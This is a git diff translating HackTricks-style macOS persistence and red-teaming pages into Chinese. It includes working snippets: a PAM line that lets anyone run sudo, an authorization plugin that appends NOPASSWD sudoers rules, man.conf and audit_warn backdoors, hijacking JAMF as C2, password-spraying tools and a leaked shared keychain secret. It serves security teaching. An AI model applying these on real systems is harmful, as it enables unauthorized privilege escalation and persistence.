[https://theevilbit.github.io/beyond/beyond_0009/](https://theevilbit.github.io/beyond/beyond_0009/) +写作: [https://theevilbit.github.io/beyond/beyond_0009/](https://theevilbit.github.io/beyond/beyond_0009/) -- Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - - It needs a specific user action -- TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +- 有助于绕过沙箱:[🟠](https://emojipedia.org/large-orange-circle) +- 需要特定用户操作 +- TCC 绕过:[🔴](https://emojipedia.org/large-red-circle) -#### Location +#### 位置 - **`/System/Library/PreferencePanes`** - **`/Library/PreferencePanes`** - **`~/Library/PreferencePanes`** -#### Description +#### 描述 -It doesn't look like this is working anymore. +这似乎不再有效。 -## Root Sandbox Bypass +## 根沙箱绕过 > [!TIP] -> Here you can find start locations useful for **sandbox bypass** that allows you to simply execute something by **writing it into a file** being **root** and/or requiring other **weird conditions.** +> 在这里你可以找到有用的启动位置,用于 **沙箱绕过**,允许你通过 **写入文件** 以 **root** 身份简单地执行某些操作,和/或需要其他 **奇怪的条件**。 -### Periodic +### 定期 -Writeup: [https://theevilbit.github.io/beyond/beyond_0019/](https://theevilbit.github.io/beyond/beyond_0019/) +写作:[https://theevilbit.github.io/beyond/beyond_0019/](https://theevilbit.github.io/beyond/beyond_0019/) -- Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - - But you need to be root -- TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +- 有助于绕过沙箱:[🟠](https://emojipedia.org/large-orange-circle) +- 但你需要是 root +- TCC 绕过:[🔴](https://emojipedia.org/large-red-circle) -#### Location +#### 位置 - `/etc/periodic/daily`, `/etc/periodic/weekly`, `/etc/periodic/monthly`, `/usr/local/etc/periodic` - - Root required - - **Trigger**: When the time comes -- `/etc/daily.local`, `/etc/weekly.local` or `/etc/monthly.local` - - Root required - - **Trigger**: When the time comes +- 需要 root +- **触发**:当时间到来时 +- `/etc/daily.local`, `/etc/weekly.local` 或 `/etc/monthly.local` +- 需要 root +- **触发**:当时间到来时 -#### Description & Exploitation - -The periodic scripts (**`/etc/periodic`**) are executed because of the **launch daemons** configured in `/System/Library/LaunchDaemons/com.apple.periodic*`. Note that scripts stored in `/etc/periodic/` are **executed** as the **owner of the file,** so this won't work for a potential privilege escalation. +#### 描述与利用 +定期脚本 (**`/etc/periodic`**) 是由于在 `/System/Library/LaunchDaemons/com.apple.periodic*` 中配置的 **启动守护进程** 而执行的。请注意,存储在 `/etc/periodic/` 中的脚本是作为 **文件的所有者** 执行的,因此这对于潜在的特权升级将无效。 ```bash # Launch daemons that will execute the periodic scripts ls -l /System/Library/LaunchDaemons/com.apple.periodic* @@ -1299,52 +1214,44 @@ total 24 total 8 -rwxr-xr-x 1 root wheel 620 May 13 00:29 999.local ``` - -There are other periodic scripts that will be executed indicated in **`/etc/defaults/periodic.conf`**: - +还有其他定期脚本将在 **`/etc/defaults/periodic.conf`** 中指示执行: ```bash grep "Local scripts" /etc/defaults/periodic.conf daily_local="/etc/daily.local" # Local scripts weekly_local="/etc/weekly.local" # Local scripts monthly_local="/etc/monthly.local" # Local scripts ``` - -If you manage to write any of the files `/etc/daily.local`, `/etc/weekly.local` or `/etc/monthly.local` it will be **executed sooner or later**. +如果您成功写入任何文件 `/etc/daily.local`、`/etc/weekly.local` 或 `/etc/monthly.local`,它将会 **迟早被执行**。 > [!WARNING] -> Note that the periodic script will be **executed as the owner of the script**. So if a regular user owns the script, it will be executed as that user (this might prevent privilege escalation attacks). +> 请注意,周期性脚本将会 **以脚本的所有者身份执行**。因此,如果常规用户拥有该脚本,它将以该用户身份执行(这可能会防止特权升级攻击)。 ### PAM -Writeup: [Linux Hacktricks PAM](../linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md)\ -Writeup: [https://theevilbit.github.io/beyond/beyond_0005/](https://theevilbit.github.io/beyond/beyond_0005/) +写作: [Linux Hacktricks PAM](../linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md)\ +写作: [https://theevilbit.github.io/beyond/beyond_0005/](https://theevilbit.github.io/beyond/beyond_0005/) -- Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - - But you need to be root -- TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +- 有助于绕过沙箱: [🟠](https://emojipedia.org/large-orange-circle) +- 但您需要是 root +- TCC 绕过: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### 位置 -- Root always required +- 始终需要 root -#### Description & Exploitation +#### 描述与利用 -As PAM is more focused in **persistence** and malware that on easy execution inside macOS, this blog won't give a detailed explanation, **read the writeups to understand this technique better**. - -Check PAM modules with: +由于 PAM 更专注于 **持久性** 和恶意软件,而不是在 macOS 中的简单执行,因此本博客不会给出详细的解释,**请阅读写作以更好地理解此技术**。 +检查 PAM 模块: ```bash ls -l /etc/pam.d ``` - -A persistence/privilege escalation technique abusing PAM is as easy as modifying the module /etc/pam.d/sudo adding at the beginning the line: - +一种利用PAM的持久性/特权提升技术,修改模块/etc/pam.d/sudo,在开头添加以下行: ```bash auth sufficient pam_permit.so ``` - -So it will **looks like** something like this: - +所以它看起来像这样: ```bash # sudo: auth account password session auth sufficient pam_permit.so @@ -1355,14 +1262,12 @@ account required pam_permit.so password required pam_deny.so session required pam_permit.so ``` - -And therefore any attempt to use **`sudo` will work**. +因此,任何尝试使用 **`sudo` 都会成功**。 > [!CAUTION] -> Note that this directory is protected by TCC so it's highly probably that the user will get a prompt asking for access. - -Another nice example is su, were you can see that it's also possible to give parameters to the PAM modules (and you coukd also backdoor this file): +> 请注意,此目录受到 TCC 保护,因此用户很可能会收到请求访问的提示。 +另一个不错的例子是 su,您可以看到也可以向 PAM 模块提供参数(您也可以对该文件进行后门处理): ```bash cat /etc/pam.d/su # su: auth account session @@ -1373,26 +1278,24 @@ account required pam_opendirectory.so no_check_shell password required pam_opendirectory.so session required pam_launchd.so ``` - -### Authorization Plugins +### 授权插件 Writeup: [https://theevilbit.github.io/beyond/beyond_0028/](https://theevilbit.github.io/beyond/beyond_0028/)\ Writeup: [https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65](https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65) -- Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - - But you need to be root and make extra configs -- TCC bypass: ??? +- 有助于绕过沙盒: [🟠](https://emojipedia.org/large-orange-circle) +- 但你需要是root并进行额外配置 +- TCC 绕过: ??? -#### Location +#### 位置 - `/Library/Security/SecurityAgentPlugins/` - - Root required - - It's also needed to configure the authorization database to use the plugin +- 需要root权限 +- 还需要配置授权数据库以使用该插件 -#### Description & Exploitation - -You can create an authorization plugin that will be executed when a user logs-in to maintain persistence. For more information about how to create one of these plugins check the previous writeups (and be careful, a poorly written one can lock you out and you will need to clean your mac from recovery mode). +#### 描述与利用 +你可以创建一个授权插件,当用户登录时执行以保持持久性。有关如何创建这些插件的更多信息,请查看之前的写作(并且要小心,写得不好的插件可能会锁定你,你需要从恢复模式清理你的mac)。 ```objectivec // Compile the code and create a real bundle // gcc -bundle -framework Foundation main.m -o CustomAuth @@ -1403,74 +1306,64 @@ You can create an authorization plugin that will be executed when a user logs-in __attribute__((constructor)) static void run() { - NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded"); - system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers"); +NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded"); +system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers"); } ``` - -**Move** the bundle to the location to be loaded: - +**移动**捆绑包到要加载的位置: ```bash cp -r CustomAuth.bundle /Library/Security/SecurityAgentPlugins/ ``` - -Finally add the **rule** to load this Plugin: - +最后添加**规则**以加载此插件: ```bash cat > /tmp/rule.plist < - class - evaluate-mechanisms - mechanisms - - CustomAuth:login,privileged - - +class +evaluate-mechanisms +mechanisms + +CustomAuth:login,privileged + + EOF security authorizationdb write com.asdf.asdf < /tmp/rule.plist ``` +**`evaluate-mechanisms`** 将告诉授权框架它需要 **调用外部机制进行授权**。此外,**`privileged`** 将使其由 root 执行。 -The **`evaluate-mechanisms`** will tell the authorization framework that it will need to **call an external mechanism for authorization**. Moreover, **`privileged`** will make it be executed by root. - -Trigger it with: - +通过以下方式触发它: ```bash security authorize com.asdf.asdf ``` - -And then the **staff group should have sudo** access (read `/etc/sudoers` to confirm). +然后 **staff 组应该具有 sudo** 访问权限(阅读 `/etc/sudoers` 以确认)。 ### Man.conf -Writeup: [https://theevilbit.github.io/beyond/beyond_0030/](https://theevilbit.github.io/beyond/beyond_0030/) +写作:[https://theevilbit.github.io/beyond/beyond_0030/](https://theevilbit.github.io/beyond/beyond_0030/) -- Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - - But you need to be root and the user must use man -- TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +- 有助于绕过沙箱:[🟠](https://emojipedia.org/large-orange-circle) +- 但你需要是 root,用户必须使用 man +- TCC 绕过:[🔴](https://emojipedia.org/large-red-circle) -#### Location +#### 位置 - **`/private/etc/man.conf`** - - Root required - - **`/private/etc/man.conf`**: Whenever man is used +- 需要 root +- **`/private/etc/man.conf`**:每当使用 man 时 -#### Description & Exploit +#### 描述与利用 -The config file **`/private/etc/man.conf`** indicate the binary/script to use when opening man documentation files. So the path to the executable could be modified so anytime the user uses man to read some docs a backdoor is executed. - -For example set in **`/private/etc/man.conf`**: +配置文件 **`/private/etc/man.conf`** 指定在打开 man 文档文件时使用的二进制文件/脚本。因此,可以修改可执行文件的路径,以便每当用户使用 man 阅读文档时,都会执行一个后门。 +例如设置在 **`/private/etc/man.conf`**: ``` MANPAGER /tmp/view ``` - -And then create `/tmp/view` as: - +然后创建 `/tmp/view` 为: ```bash #!/bin/zsh @@ -1478,40 +1371,34 @@ touch /tmp/manconf /usr/bin/less -s ``` - ### Apache2 **Writeup**: [https://theevilbit.github.io/beyond/beyond_0023/](https://theevilbit.github.io/beyond/beyond_0023/) -- Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - - But you need to be root and apache needs to be running -- TCC bypass: [🔴](https://emojipedia.org/large-red-circle) - - Httpd doesn't have entitlements +- 有助于绕过沙箱: [🟠](https://emojipedia.org/large-orange-circle) +- 但你需要是 root 并且 apache 需要在运行 +- TCC 绕过: [🔴](https://emojipedia.org/large-red-circle) +- Httpd 没有权限 -#### Location +#### 位置 - **`/etc/apache2/httpd.conf`** - - Root required - - Trigger: When Apache2 is started +- 需要 root 权限 +- 触发: 当 Apache2 启动时 -#### Description & Exploit - -You can indicate in `/etc/apache2/httpd.conf` to load a module adding a line such as: +#### 描述与利用 +你可以在 `/etc/apache2/httpd.conf` 中指示加载一个模块,添加一行如下: ```bash LoadModule my_custom_module /Users/Shared/example.dylib "My Signature Authority" ``` +这样,您的编译模块将由 Apache 加载。唯一的要求是您需要 **用有效的 Apple 证书签名**,或者您需要 **在系统中添加一个新的受信任证书** 并 **用它签名**。 -This way your compiled moduled will be loaded by Apache. The only thing is that either you need to **sign it with a valid Apple certificate**, or you need to **add a new trusted certificate** in the system and **sign it** with it. - -Then, if needed , to make sure the server will be started you could execute: - +然后,如果需要,您可以执行以下操作以确保服务器启动: ```bash sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist ``` - -Code example for the Dylb: - +Dylb的代码示例: ```objectivec #include #include @@ -1519,137 +1406,127 @@ Code example for the Dylb: __attribute__((constructor)) static void myconstructor(int argc, const char **argv) { - printf("[+] dylib constructor called from %s\n", argv[0]); - syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]); +printf("[+] dylib constructor called from %s\n", argv[0]); +syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]); } ``` - -### BSM audit framework +### BSM审计框架 Writeup: [https://theevilbit.github.io/beyond/beyond_0031/](https://theevilbit.github.io/beyond/beyond_0031/) -- Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - - But you need to be root, auditd be running and cause a warning -- TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +- 有助于绕过沙盒: [🟠](https://emojipedia.org/large-orange-circle) +- 但你需要是root,auditd必须运行并引发警告 +- TCC绕过: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### 位置 - **`/etc/security/audit_warn`** - - Root required - - **Trigger**: When auditd detects a warning +- 需要root权限 +- **触发**: 当auditd检测到警告时 -#### Description & Exploit - -Whenever auditd detects a warning the script **`/etc/security/audit_warn`** is **executed**. So you could add your payload on it. +#### 描述与利用 +每当auditd检测到警告时,脚本**`/etc/security/audit_warn`**会被**执行**。所以你可以在其中添加你的有效载荷。 ```bash echo "touch /tmp/auditd_warn" >> /etc/security/audit_warn ``` +您可以使用 `sudo audit -n` 强制发出警告。 -You could force a warning with `sudo audit -n`. +### 启动项 -### Startup Items +> [!CAUTION] > **这已被弃用,因此这些目录中不应找到任何内容。** -> [!CAUTION] > **This is deprecated, so nothing should be found in those directories.** +**StartupItem** 是一个目录,应该位于 `/Library/StartupItems/` 或 `/System/Library/StartupItems/` 中。一旦建立此目录,它必须包含两个特定文件: -The **StartupItem** is a directory that should be positioned within either `/Library/StartupItems/` or `/System/Library/StartupItems/`. Once this directory is established, it must encompass two specific files: +1. 一个 **rc 脚本**:在启动时执行的 shell 脚本。 +2. 一个 **plist 文件**,特定命名为 `StartupParameters.plist`,其中包含各种配置设置。 -1. An **rc script**: A shell script executed at startup. -2. A **plist file**, specifically named `StartupParameters.plist`, which contains various configuration settings. - -Ensure that both the rc script and the `StartupParameters.plist` file are correctly placed inside the **StartupItem** directory for the startup process to recognize and utilize them. +确保 rc 脚本和 `StartupParameters.plist` 文件正确放置在 **StartupItem** 目录中,以便启动过程能够识别和使用它们。 {{#tabs}} {{#tab name="StartupParameters.plist"}} - ```xml - Description - This is a description of this service - OrderPreference - None - Provides - - superservicename - +Description +This is a description of this service +OrderPreference +None +Provides + +superservicename + ``` - {{#endtab}} {{#tab name="superservicename"}} - ```bash #!/bin/sh . /etc/rc.common StartService(){ - touch /tmp/superservicestarted +touch /tmp/superservicestarted } StopService(){ - rm /tmp/superservicestarted +rm /tmp/superservicestarted } RestartService(){ - echo "Restarting" +echo "Restarting" } RunService "$1" ``` - {{#endtab}} {{#endtabs}} ### ~~emond~~ > [!CAUTION] -> I cannot find this component in my macOS so for more info check the writeup +> 我在我的 macOS 中找不到这个组件,因此有关更多信息,请查看写作 -Writeup: [https://theevilbit.github.io/beyond/beyond_0023/](https://theevilbit.github.io/beyond/beyond_0023/) +写作: [https://theevilbit.github.io/beyond/beyond_0023/](https://theevilbit.github.io/beyond/beyond_0023/) -Introduced by Apple, **emond** is a logging mechanism that seems to be underdeveloped or possibly abandoned, yet it remains accessible. While not particularly beneficial for a Mac administrator, this obscure service could serve as a subtle persistence method for threat actors, likely unnoticed by most macOS admins. - -For those aware of its existence, identifying any malicious usage of **emond** is straightforward. The system's LaunchDaemon for this service seeks scripts to execute in a single directory. To inspect this, the following command can be used: +由苹果引入,**emond** 是一种日志记录机制,似乎尚未开发或可能被遗弃,但仍然可以访问。虽然对 Mac 管理员并没有特别的好处,但这个晦涩的服务可能作为威胁行为者的微妙持久性方法,可能不会被大多数 macOS 管理员注意到。 +对于那些知道其存在的人,识别 **emond** 的任何恶意使用是简单的。该服务的系统 LaunchDaemon 在一个目录中寻找要执行的脚本。要检查这一点,可以使用以下命令: ```bash ls -l /private/var/db/emondClients ``` - ### ~~XQuartz~~ Writeup: [https://theevilbit.github.io/beyond/beyond_0018/](https://theevilbit.github.io/beyond/beyond_0018/) -#### Location +#### 位置 - **`/opt/X11/etc/X11/xinit/privileged_startx.d`** - - Root required - - **Trigger**: With XQuartz +- 需要root权限 +- **触发**: 使用XQuartz -#### Description & Exploit +#### 描述与利用 -XQuartz is **no longer installed in macOS**, so if you want more info check the writeup. +XQuartz在**macOS中不再安装**,所以如果你想要更多信息,请查看写作。 ### ~~kext~~ > [!CAUTION] -> It's so complicated to install kext even as root taht I won't consider this to escape from sandboxes or even for persistence (unless you have an exploit) +> 即使作为root安装kext也非常复杂,因此我不会考虑这作为逃避沙箱或持久性的手段(除非你有一个漏洞) -#### Location +#### 位置 -In order to install a KEXT as a startup item, it needs to be **installed in one of the following locations**: +为了将KEXT作为启动项安装,它需要**安装在以下位置之一**: - `/System/Library/Extensions` - - KEXT files built into the OS X operating system. +- 内置于OS X操作系统的KEXT文件。 - `/Library/Extensions` - - KEXT files installed by 3rd party software - -You can list currently loaded kext files with: +- 由第三方软件安装的KEXT文件 +你可以使用以下命令列出当前加载的kext文件: ```bash kextstat #List loaded kext kextload /path/to/kext.kext #Load a new one based on path @@ -1657,44 +1534,42 @@ kextload -b com.apple.driver.ExampleBundle #Load a new one based on path kextunload /path/to/kext.kext kextunload -b com.apple.driver.ExampleBundle ``` - -For more information about [**kernel extensions check this section**](macos-security-and-privilege-escalation/mac-os-architecture/#i-o-kit-drivers). +有关[**内核扩展的更多信息,请查看本节**](macos-security-and-privilege-escalation/mac-os-architecture/#i-o-kit-drivers)。 ### ~~amstoold~~ -Writeup: [https://theevilbit.github.io/beyond/beyond_0029/](https://theevilbit.github.io/beyond/beyond_0029/) +写作: [https://theevilbit.github.io/beyond/beyond_0029/](https://theevilbit.github.io/beyond/beyond_0029/) -#### Location +#### 位置 - **`/usr/local/bin/amstoold`** - - Root required +- 需要root权限 -#### Description & Exploitation +#### 描述与利用 -Apparently the `plist` from `/System/Library/LaunchAgents/com.apple.amstoold.plist` was using this binary while exposing a XPC service... the thing is that the binary didn't exist, so you could place something there and when the XPC service gets called your binary will be called. +显然,来自`/System/Library/LaunchAgents/com.apple.amstoold.plist`的`plist`在暴露XPC服务时使用了这个二进制文件……问题是这个二进制文件并不存在,因此你可以在这里放置一些东西,当XPC服务被调用时,你的二进制文件将被调用。 -I can no longer find this in my macOS. +我在我的macOS中找不到这个。 ### ~~xsanctl~~ -Writeup: [https://theevilbit.github.io/beyond/beyond_0015/](https://theevilbit.github.io/beyond/beyond_0015/) +写作: [https://theevilbit.github.io/beyond/beyond_0015/](https://theevilbit.github.io/beyond/beyond_0015/) -#### Location +#### 位置 - **`/Library/Preferences/Xsan/.xsanrc`** - - Root required - - **Trigger**: When the service is run (rarely) +- 需要root权限 +- **触发**: 当服务运行时(很少) -#### Description & exploit +#### 描述与利用 -Apparently it's not very common to run this script and I couldn't even find it in my macOS, so if you want more info check the writeup. +显然,运行这个脚本并不常见,我甚至在我的macOS中找不到它,所以如果你想要更多信息,请查看写作。 ### ~~/etc/rc.common~~ -> [!CAUTION] > **This isn't working in modern MacOS versions** - -It's also possible to place here **commands that will be executed at startup.** Example os regular rc.common script: +> [!CAUTION] > **这在现代MacOS版本中不起作用** +在这里也可以放置**将在启动时执行的命令。** 示例是常规的rc.common脚本: ```bash # # Common setup for startup scripts. @@ -1734,16 +1609,16 @@ PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; ex # CheckForNetwork() { - local test +local test - if [ -z "${NETWORKUP:=}" ]; then - test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l) - if [ "${test}" -gt 0 ]; then - NETWORKUP="-YES-" - else - NETWORKUP="-NO-" - fi - fi +if [ -z "${NETWORKUP:=}" ]; then +test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l) +if [ "${test}" -gt 0 ]; then +NETWORKUP="-YES-" +else +NETWORKUP="-NO-" +fi +fi } alias ConsoleMessage=echo @@ -1753,25 +1628,25 @@ alias ConsoleMessage=echo # GetPID () { - local program="$1" - local pidfile="${PIDFILE:=/var/run/${program}.pid}" - local pid="" +local program="$1" +local pidfile="${PIDFILE:=/var/run/${program}.pid}" +local pid="" - if [ -f "${pidfile}" ]; then - pid=$(head -1 "${pidfile}") - if ! kill -0 "${pid}" 2> /dev/null; then - echo "Bad pid file $pidfile; deleting." - pid="" - rm -f "${pidfile}" - fi - fi +if [ -f "${pidfile}" ]; then +pid=$(head -1 "${pidfile}") +if ! kill -0 "${pid}" 2> /dev/null; then +echo "Bad pid file $pidfile; deleting." +pid="" +rm -f "${pidfile}" +fi +fi - if [ -n "${pid}" ]; then - echo "${pid}" - return 0 - else - return 1 - fi +if [ -n "${pid}" ]; then +echo "${pid}" +return 0 +else +return 1 +fi } # @@ -1779,16 +1654,15 @@ GetPID () # RunService () { - case $1 in - start ) StartService ;; - stop ) StopService ;; - restart) RestartService ;; - * ) echo "$0: unknown argument: $1";; - esac +case $1 in +start ) StartService ;; +stop ) StopService ;; +restart) RestartService ;; +* ) echo "$0: unknown argument: $1";; +esac } ``` - -## Persistence techniques and tools +## 持久性技术和工具 - [https://github.com/cedowens/Persistent-Swift](https://github.com/cedowens/Persistent-Swift) - [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA) diff --git a/src/macos-hardening/macos-red-teaming/README.md b/src/macos-hardening/macos-red-teaming/README.md index 3701205f8..e915db6b8 100644 --- a/src/macos-hardening/macos-red-teaming/README.md +++ b/src/macos-hardening/macos-red-teaming/README.md @@ -2,109 +2,98 @@ {{#include ../../banners/hacktricks-training.md}} -
-**Get a hacker's perspective on your web apps, network, and cloud** - -**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports. - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} - -## Abusing MDMs +## 滥用 MDM - JAMF Pro: `jamf checkJSSConnection` - Kandji -If you manage to **compromise admin credentials** to access the management platform, you can **potentially compromise all the computers** by distributing your malware in the machines. +如果你成功**获取管理员凭据**以访问管理平台,你可以**潜在地危害所有计算机**,通过在机器上分发恶意软件。 -For red teaming in MacOS environments it's highly recommended to have some understanding of how the MDMs work: +在 MacOS 环境中进行红队活动,强烈建议对 MDM 的工作原理有一定了解: {{#ref}} macos-mdm/ {{#endref}} -### Using MDM as a C2 +### 将 MDM 用作 C2 -A MDM will have permission to install, query or remove profiles, install applications, create local admin accounts, set firmware password, change the FileVault key... +MDM 将有权限安装、查询或删除配置文件,安装应用程序,创建本地管理员帐户,设置固件密码,更改 FileVault 密钥... -In order to run your own MDM you need to **your CSR signed by a vendor** which you could try to get with [**https://mdmcert.download/**](https://mdmcert.download/). And to run your own MDM for Apple devices you could use [**MicroMDM**](https://github.com/micromdm/micromdm). +为了运行自己的 MDM,你需要**你的 CSR 由供应商签名**,你可以尝试通过 [**https://mdmcert.download/**](https://mdmcert.download/) 获取。要为 Apple 设备运行自己的 MDM,你可以使用 [**MicroMDM**](https://github.com/micromdm/micromdm)。 -However, to install an application in an enrolled device, you still need it to be signed by a developer account... however, upon MDM enrolment the **device adds the SSL cert of the MDM as a trusted CA**, so you can now sign anything. +然而,要在注册设备上安装应用程序,你仍然需要它由开发者帐户签名... 然而,在 MDM 注册时,**设备将 MDM 的 SSL 证书添加为受信任的 CA**,所以你现在可以签署任何东西。 -To enrol the device in a MDM you. need to install a **`mobileconfig`** file as root, which could be delivered via a **pkg** file (you could compress it in zip and when downloaded from safari it will be decompressed). +要将设备注册到 MDM,你需要以 root 身份安装一个**`mobileconfig`** 文件,这可以通过**pkg** 文件传递(你可以将其压缩为 zip,当从 Safari 下载时会被解压)。 -**Mythic agent Orthrus** uses this technique. +**Mythic agent Orthrus** 使用了这种技术。 -### Abusing JAMF PRO +### 滥用 JAMF PRO -JAMF can run **custom scripts** (scripts developed by the sysadmin), **native payloads** (local account creation, set EFI password, file/process monitoring...) and **MDM** (device configurations, device certificates...). +JAMF 可以运行**自定义脚本**(由系统管理员开发的脚本)、**本地有效载荷**(本地帐户创建、设置 EFI 密码、文件/进程监控...)和**MDM**(设备配置、设备证书...)。 -#### JAMF self-enrolment +#### JAMF 自助注册 -Go to a page such as `https://.jamfcloud.com/enroll/` to see if they have **self-enrolment enabled**. If they have it might **ask for credentials to access**. +访问 `https://.jamfcloud.com/enroll/` 这样的页面,查看他们是否启用了**自助注册**。如果启用了,可能会**要求输入凭据以访问**。 -You could use the script [**JamfSniper.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfSniper.py) to perform a password spraying attack. +你可以使用脚本 [**JamfSniper.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfSniper.py) 执行密码喷洒攻击。 -Moreover, after finding proper credentials you could be able to brute-force other usernames with the next form: +此外,在找到合适的凭据后,你可能能够使用下一个表单暴力破解其他用户名: ![](<../../images/image (107).png>) -#### JAMF device Authentication +#### JAMF 设备认证
-The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\ -Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`** +**`jamf`** 二进制文件包含打开钥匙串的秘密,在发现时是**共享**给每个人的,内容是:**`jk23ucnq91jfu9aj`**。\ +此外,jamf **持久化**为**LaunchDaemon** 在 **`/Library/LaunchAgents/com.jamf.management.agent.plist`** -#### JAMF Device Takeover - -The **JSS** (Jamf Software Server) **URL** that **`jamf`** will use is located in **`/Library/Preferences/com.jamfsoftware.jamf.plist`**.\ -This file basically contains the URL: +#### JAMF 设备接管 +**JSS**(Jamf 软件服务器)**URL** 是 **`jamf`** 将使用的,位于 **`/Library/Preferences/com.jamfsoftware.jamf.plist`**。\ +该文件基本上包含 URL: ```bash plutil -convert xml1 -o - /Library/Preferences/com.jamfsoftware.jamf.plist [...] - is_virtual_machine - - jss_url - https://halbornasd.jamfcloud.com/ - last_management_framework_change_id - 4 +is_virtual_machine + +jss_url +https://halbornasd.jamfcloud.com/ +last_management_framework_change_id +4 [...] ``` - -So, an attacker could drop a malicious package (`pkg`) that **overwrites this file** when installed setting the **URL to a Mythic C2 listener from a Typhon agent** to now be able to abuse JAMF as C2. - +因此,攻击者可以放置一个恶意包(`pkg`),在安装时**覆盖此文件**,将**URL设置为来自Typhon代理的Mythic C2监听器**,从而能够滥用JAMF作为C2。 ```bash # After changing the URL you could wait for it to be reloaded or execute: sudo jamf policy -id 0 # TODO: There is an ID, maybe it's possible to have the real jamf connection and another one to the C2 ``` +#### JAMF 冒充 -#### JAMF Impersonation +为了**冒充设备与 JMF 之间的通信**,你需要: -In order to **impersonate the communication** between a device and JMF you need: +- 设备的 **UUID**: `ioreg -d2 -c IOPlatformExpertDevice | awk -F" '/IOPlatformUUID/{print $(NF-1)}'` +- **JAMF 密钥链**来自: `/Library/Application\ Support/Jamf/JAMF.keychain`,其中包含设备证书 -- The **UUID** of the device: `ioreg -d2 -c IOPlatformExpertDevice | awk -F" '/IOPlatformUUID/{print $(NF-1)}'` -- The **JAMF keychain** from: `/Library/Application\ Support/Jamf/JAMF.keychain` which contains the device certificate +有了这些信息,**创建一个虚拟机**,使用**被盗**的硬件 **UUID** 并且**禁用 SIP**,放置 **JAMF 密钥链,** **hook** Jamf **代理**并窃取其信息。 -With this information, **create a VM** with the **stolen** Hardware **UUID** and with **SIP disabled**, drop the **JAMF keychain,** **hook** the Jamf **agent** and steal its information. - -#### Secrets stealing +#### 秘密窃取

a

-You could also monitor the location `/Library/Application Support/Jamf/tmp/` for the **custom scripts** admins might want to execute via Jamf as they are **placed here, executed and removed**. These scripts **might contain credentials**. +你还可以监控位置 `/Library/Application Support/Jamf/tmp/`,以获取管理员可能希望通过 Jamf 执行的 **自定义脚本**,因为它们**在这里放置、执行并移除**。这些脚本**可能包含凭据**。 -However, **credentials** might be passed tho these scripts as **parameters**, so you would need to monitor `ps aux | grep -i jamf` (without even being root). +然而,**凭据**可能作为**参数**传递给这些脚本,因此你需要监控 `ps aux | grep -i jamf`(甚至不需要是 root)。 -The script [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfExplorer.py) can listen for new files being added and new process arguments. +脚本 [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfExplorer.py) 可以监听新文件的添加和新进程参数。 -### macOS Remote Access +### macOS 远程访问 -And also about **MacOS** "special" **network** **protocols**: +还有关于 **MacOS** "特殊" **网络** **协议**: {{#ref}} ../macos-security-and-privilege-escalation/macos-protocols.md @@ -112,7 +101,7 @@ And also about **MacOS** "special" **network** **protocols**: ## Active Directory -In some occasions you will find that the **MacOS computer is connected to an AD**. In this scenario you should try to **enumerate** the active directory as you are use to it. Find some **help** in the following pages: +在某些情况下,你会发现 **MacOS 计算机连接到 AD**。在这种情况下,你应该尝试**枚举**活动目录,就像你习惯的那样。在以下页面中找到一些**帮助**: {{#ref}} ../../network-services-pentesting/pentesting-ldap.md @@ -126,41 +115,36 @@ In some occasions you will find that the **MacOS computer is connected to an AD* ../../network-services-pentesting/pentesting-kerberos-88/ {{#endref}} -Some **local MacOS tool** that may also help you is `dscl`: - +一些**本地 MacOS 工具**也可能对你有帮助,`dscl`: ```bash dscl "/Active Directory/[Domain]/All Domains" ls / ``` +还为MacOS准备了一些工具,以自动枚举AD并与kerberos进行交互: -Also there are some tools prepared for MacOS to automatically enumerate the AD and play with kerberos: - -- [**Machound**](https://github.com/XMCyber/MacHound): MacHound is an extension to the Bloodhound audting tool allowing collecting and ingesting of Active Directory relationships on MacOS hosts. -- [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost is an Objective-C project designed to interact with the Heimdal krb5 APIs on macOS. The goal of the project is to enable better security testing around Kerberos on macOS devices using native APIs 